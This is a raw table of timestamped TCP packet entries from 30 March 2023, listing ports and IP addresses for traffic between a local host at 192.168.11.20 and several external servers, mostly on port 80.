Mar 30, 2023 10:35:53.775007963 CEST	49701	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:35:56.154442072 CEST	80	49717	192.229.221.95	192.168.11.20
Mar 30, 2023 10:35:56.154769897 CEST	49717	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:18.000386000 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.141519070 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.142101049 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.142750978 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.283159971 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.283761978 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.283840895 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.283854961 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.283938885 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.283962965 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.283999920 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.284012079 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.284023046 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.284034967 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.284045935 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.284056902 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.284102917 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.284248114 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.284248114 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.284248114 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.284248114 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.424685955 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.424782038 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.424844027 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.424897909 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.424911976 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.424993038 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425060987 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425064087 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425142050 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425201893 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425234079 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425235033 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425281048 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425352097 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425405979 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425415993 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425488949 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425546885 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425575018 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425575018 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425633907 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425698042 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425748110 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425748110 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425770044 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425843954 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425904036 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.425916910 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.425987005 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.426048040 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.426084995 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.426085949 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.426254988 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.566668987 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.566715002 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.566848993 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.566893101 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.566922903 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.566951036 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.566977024 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567004919 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567035913 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567035913 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567037106 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567081928 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567111969 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567137957 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567164898 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567192078 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567209005 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567209005 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567234993 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567266941 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567293882 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567321062 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567348003 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567377090 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567378044 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567377090 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567418098 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567445993 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567472935 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567500114 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567528009 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567543983 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567567110 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567599058 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567625999 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567653894 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567681074 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567708015 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567715883 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567749977 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567778111 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567804098 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567831039 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567857027 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567887068 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567887068 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.567888975 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567929029 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567956924 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.567984104 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.568057060 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.568057060 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.568228960 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.708658934 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.708755970 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.708826065 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.708899021 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.708956957 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.709013939 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.709043026 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.709043026 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.709103107 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.709172010 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.709206104 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.709255934 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.709320068 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.709379911 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.709546089 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.709753036 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.710424900 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710520029 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710570097 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710594893 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.710624933 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710669994 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710707903 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710745096 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710766077 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.710767031 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.710767031 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.710797071 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710843086 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710880041 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.710937023 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.710988045 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711030960 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711070061 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711107016 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711107016 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711107016 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711107016 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711127996 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711186886 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711241007 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711277008 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711277008 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711344004 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711386919 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711427927 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711443901 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711445093 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711483955 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711528063 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711568117 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711610079 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711616039 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711616039 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711616039 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711616039 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711669922 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711714029 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711752892 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711791039 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711791039 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711791039 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711800098 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711853027 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711890936 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711927891 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.711956024 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.711973906 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712019920 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712059975 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712099075 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712129116 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712129116 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712129116 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712129116 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712129116 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712129116 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712129116 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712147951 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712208033 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712250948 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712297916 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712297916 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712297916 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712299109 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712338924 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712399960 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712439060 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712466002 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712486029 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712532997 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712569952 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712605953 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712639093 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712639093 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712639093 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712639093 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712651968 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712706089 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712743998 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712780952 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712806940 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712806940 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712806940 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.712831020 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712878942 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712915897 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712953091 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.712974072 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713004112 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713047028 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713083029 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713119030 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713155031 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713155031 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713155031 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713155985 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713155985 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713169098 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713227034 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713268995 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713308096 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713315010 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713315010 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713315964 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713366032 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713409901 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713449001 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713485003 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713485003 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713485003 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713494062 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713546991 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713587046 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713625908 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713653088 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713676929 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:18.713829994 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713829994 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713829994 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713829994 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713829994 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:18.713990927 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:23.568058968 CEST	80	49790	34.138.169.8	192.168.11.20
Mar 30, 2023 10:36:23.568180084 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:27.199642897 CEST	80	49756	192.229.221.95	192.168.11.20
Mar 30, 2023 10:36:27.199841976 CEST	49756	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:31.873833895 CEST	49761	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:32.121155024 CEST	49701	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:32.128177881 CEST	80	49701	192.229.221.95	192.168.11.20
Mar 30, 2023 10:36:32.128449917 CEST	49701	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:34.464375019 CEST	49675	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:34.471050978 CEST	80	49675	192.229.221.95	192.168.11.20
Mar 30, 2023 10:36:34.471329927 CEST	49675	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:34.830785990 CEST	80	49765	192.229.221.95	192.168.11.20
Mar 30, 2023 10:36:34.830991983 CEST	49765	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:35.325712919 CEST	80	49768	192.229.221.95	192.168.11.20
Mar 30, 2023 10:36:35.325963020 CEST	49768	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:40.623096943 CEST	49790	80	192.168.11.20	34.138.169.8
Mar 30, 2023 10:36:44.946424961 CEST	49717	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:36:44.953460932 CEST	80	49717	192.229.221.95	192.168.11.20
Mar 30, 2023 10:36:44.953619003 CEST	49717	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:37:15.781889915 CEST	49796	80	192.168.11.20	122.201.64.145
Mar 30, 2023 10:37:16.052534103 CEST	80	49796	122.201.64.145	192.168.11.20
Mar 30, 2023 10:37:16.052925110 CEST	49796	80	192.168.11.20	122.201.64.145
Mar 30, 2023 10:37:16.052925110 CEST	49796	80	192.168.11.20	122.201.64.145
Mar 30, 2023 10:37:16.328691006 CEST	80	49796	122.201.64.145	192.168.11.20
Mar 30, 2023 10:37:16.329334021 CEST	49796	80	192.168.11.20	122.201.64.145
Mar 30, 2023 10:37:16.329334974 CEST	49796	80	192.168.11.20	122.201.64.145
Mar 30, 2023 10:37:16.600097895 CEST	80	49796	122.201.64.145	192.168.11.20
Mar 30, 2023 10:37:16.830384970 CEST	49757	443	192.168.11.20	2.16.241.97
Mar 30, 2023 10:37:16.841260910 CEST	443	49757	2.16.241.97	192.168.11.20
Mar 30, 2023 10:37:16.841320992 CEST	443	49757	2.16.241.97	192.168.11.20
Mar 30, 2023 10:37:16.841489077 CEST	49757	443	192.168.11.20	2.16.241.97
Mar 30, 2023 10:37:16.841489077 CEST	49757	443	192.168.11.20	2.16.241.97
Mar 30, 2023 10:37:16.878402948 CEST	49756	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:37:16.885373116 CEST	80	49756	192.229.221.95	192.168.11.20
Mar 30, 2023 10:37:16.885699034 CEST	49756	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:37:23.188319921 CEST	49765	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:37:23.195425987 CEST	80	49765	192.229.221.95	192.168.11.20
Mar 30, 2023 10:37:23.195755959 CEST	49765	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:37:36.645112991 CEST	49798	80	192.168.11.20	15.197.142.173
Mar 30, 2023 10:37:36.655422926 CEST	80	49798	15.197.142.173	192.168.11.20
Mar 30, 2023 10:37:36.655674934 CEST	49798	80	192.168.11.20	15.197.142.173
Mar 30, 2023 10:37:36.655891895 CEST	49798	80	192.168.11.20	15.197.142.173
Mar 30, 2023 10:37:36.666057110 CEST	80	49798	15.197.142.173	192.168.11.20
Mar 30, 2023 10:37:36.699095011 CEST	80	49798	15.197.142.173	192.168.11.20
Mar 30, 2023 10:37:36.699132919 CEST	80	49798	15.197.142.173	192.168.11.20
Mar 30, 2023 10:37:36.699446917 CEST	49798	80	192.168.11.20	15.197.142.173
Mar 30, 2023 10:37:36.699448109 CEST	49798	80	192.168.11.20	15.197.142.173
Mar 30, 2023 10:37:36.709863901 CEST	80	49798	15.197.142.173	192.168.11.20
Mar 30, 2023 10:37:36.765746117 CEST	80	49768	192.229.221.95	192.168.11.20
Mar 30, 2023 10:37:36.765924931 CEST	49768	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:37:56.907454967 CEST	49800	80	192.168.11.20	185.53.179.91
Mar 30, 2023 10:37:56.926970005 CEST	80	49800	185.53.179.91	192.168.11.20
Mar 30, 2023 10:37:56.927436113 CEST	49800	80	192.168.11.20	185.53.179.91
Mar 30, 2023 10:37:56.947185040 CEST	80	49800	185.53.179.91	192.168.11.20
Mar 30, 2023 10:37:56.947570086 CEST	49800	80	192.168.11.20	185.53.179.91
Mar 30, 2023 10:37:56.967432976 CEST	80	49800	185.53.179.91	192.168.11.20
Mar 30, 2023 10:37:56.967578888 CEST	80	49800	185.53.179.91	192.168.11.20
Mar 30, 2023 10:37:56.967658997 CEST	80	49800	185.53.179.91	192.168.11.20
Mar 30, 2023 10:37:56.968027115 CEST	49800	80	192.168.11.20	185.53.179.91
Mar 30, 2023 10:37:56.968027115 CEST	49800	80	192.168.11.20	185.53.179.91
Mar 30, 2023 10:37:56.987514973 CEST	80	49800	185.53.179.91	192.168.11.20
Mar 30, 2023 10:38:33.623187065 CEST	80	49768	192.229.221.95	192.168.11.20
Mar 30, 2023 10:38:33.623445034 CEST	49768	80	192.168.11.20	192.229.221.95
Mar 30, 2023 10:38:37.363398075 CEST	49802	80	192.168.11.20	195.179.237.158
Mar 30, 2023 10:38:37.509201050 CEST	80	49802	195.179.237.158	192.168.11.20
Mar 30, 2023 10:38:37.509540081 CEST	49802	80	192.168.11.20	195.179.237.158
Mar 30, 2023 10:38:37.509629011 CEST	49802	80	192.168.11.20	195.179.237.158
Mar 30, 2023 10:38:37.655596972 CEST	80	49802	195.179.237.158	192.168.11.20
Mar 30, 2023 10:38:37.655874014 CEST	80	49802	195.179.237.158	192.168.11.20
Mar 30, 2023 10:38:37.656342030 CEST	49802	80	192.168.11.20	195.179.237.158
Mar 30, 2023 10:38:37.656693935 CEST	80	49802	195.179.237.158	192.168.11.20
Mar 30, 2023 10:38:37.656848907 CEST	49802	80	192.168.11.20	195.179.237.158
Mar 30, 2023 10:38:37.802423000 CEST	80	49802	195.179.237.158	192.168.11.20
Mar 30, 2023 10:38:57.857428074 CEST	49804	80	192.168.11.20	34.102.136.180
Mar 30, 2023 10:38:57.873338938 CEST	80	49804	34.102.136.180	192.168.11.20
Mar 30, 2023 10:38:57.873634100 CEST	49804	80	192.168.11.20	34.102.136.180
Mar 30, 2023 10:38:57.873696089 CEST	49804	80	192.168.11.20	34.102.136.180
Mar 30, 2023 10:38:57.889580965 CEST	80	49804	34.102.136.180	192.168.11.20
Mar 30, 2023 10:38:57.987468004 CEST	80	49804	34.102.136.180	192.168.11.20
Mar 30, 2023 10:38:57.987564087 CEST	80	49804	34.102.136.180	192.168.11.20
